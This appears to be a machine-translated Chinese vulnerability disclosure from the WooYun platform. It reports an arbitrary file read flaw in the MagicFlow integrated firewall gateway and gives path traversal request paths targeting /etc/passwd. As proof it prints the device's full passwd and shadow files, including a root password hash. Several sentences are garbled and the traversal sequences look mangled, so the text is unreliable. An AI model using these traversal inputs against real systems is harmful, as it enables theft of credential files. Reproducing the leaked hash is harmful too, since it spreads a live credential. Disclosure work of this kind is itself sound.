MagicFlow有线无线一体化防火墙网关系统任意文件读取漏洞

漏洞标题 MagicFlow有线无线一体化防火墙网关系统任意文件读取漏洞 相关厂商 MagicFlow 漏洞作者 Aasron 提交时间 2016-05-11 16:10 公开时间 2016-06-2…

漏洞标题 MagicFlow有线和无线集成防火墙网关系统任意文件读取漏洞 相关制造商 MagicFlow 漏洞作者 Aasron 提交时间 2016-05-11 16: 10 公共时间 2016-06-27 18: 50 漏洞类型 任何文件遍历/下载 危险等级 高 自我评估等级 20 漏洞状态 已提交给第三方合作机构(cncert National Internet Emergency Center) 标签标签 读取任何文件,不过滤文件操作参数,读取和使用任何文件,并且不过滤参数。 漏洞详细信息 MagicFlow有线和无线集成防火墙网关是一种灵活的软件刀片架构集成硬件防火墙设备,用于有线和无线网络融合。它安装基本软件刀片,以形成全面且易于使用的安全网关解决方案。集成安全刀片,管理刀片,网络基础架构刀片和其他多功能集成系统,以满足下一代企业级有线和无线集成网络的需求,提供下一代网络网络,安全和管理需求,可持续,简单高效的方式 可能是介绍 看起来像模型的完整版传递kill

现有的路径几乎可以使用 只使用其中一条路径即可使用。 漏洞证明:

Root: x: 0: 0: root:/root:/bin/bash Bin: x: 1: 1: bin:/bin:/sbin/nologin 守护进程: x: 2: 2:守护进程:/sbin:/sbin/nologin Adm: x: 3: 4: adm:/var/adm:/sbin/nologin Lp: x: 4: 7: lp:/var/spool/lpd:/sbin/nologin 同步: x: 5: 0:同步:/sbin:/bin/sync 关机: x: 6: 0:关机:/sbin:/sbin/shutdown 停止: x: 7: 0:停止:/sbin:/sbin/halt 邮件: x: 8: 12:邮件:/var/spool/mail:/sbin/nologin Uucp: x: 10: 14: uucp:/var/spool/uucp:/sbin/nologin 运算符: x: 11: 0:运算符:/root:/sbin/nologin 游戏: x: 12: 100:游戏:/usr /游戏:/sbin/nologin Gopher: x: 13: 30: gopher:/var/gopher:/sbin/nologin Ftp: x: 14: 50: FTP用户:/var/ftp:/sbin/nologin 没有人: x: 99: 99:没有人: /:/sbin/nologin Vcsa: x: 69: 69:虚拟控制台内存拥有者:/dev:/sbin/nologin Saslauth: x: 499: 76:'Saslauthd用户':/var/empty/saslauth:/sbin/nologin Postfix: x: 89: 89:/var/spool/postfix:/sbin/nologin Sshd: x: 74: 74:权限分离的SSH:/var/empty/sshd:/sbin/nologin Postgres: x: 500: 500:/home/postgres:/bin/bash

根: $ 6 $ WlwYInfswISNikU7 $ N370hMHQ9lKgaVZHi/.2mDz7GCfLJSL8jt/Ll/.AsaBuO/TNY2J8K2PYY3PkeFOLNx3DuKmmoAiTYd9KLSoXe /: 16707: 0: 99999: 7: Bin: *: 15628: 0: 99999: 7: 守护进程: *: 15628: 0: 99999: 7: Adm: *: 15628: 0: 99999: 7: Lp: *: 15628: 0: 99999: 7: 同步: *: 15628: 0: 99999: 7: 关机: *: 15628: 0: 99999: 7: 暂停: *: 15628: 0: 99999: 7: 邮件: *: 15628: 0: 99999: 7: Uucp: *: 15628: 0: 99999: 7: 运算符: *: 15628: 0: 99999: 7: 游戏: *: 15628: 0: 99999: 7: Gopher: *: 15628: 0: 99999: 7: Ftp: *: 15628: 0: 99999: 7: 没有人: *: 15628: 0: 99999: 7: Vcsa: !!: 16707:: Saslauth: !!: 16707:: 后缀: !!: 16707:: Sshd: !!: 16707:: Postgres: !!: 16707: 0: 99999: 7: /css/././././././././etc/passwd /ext/resources/images/default/././././././././etc/passwd 许多人没有逐一列出 附件案地址: ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / 修理计划: 操作功能和过滤 版权声明:请注明出处Aasron @乌云

你可能感兴趣的文章

相关问题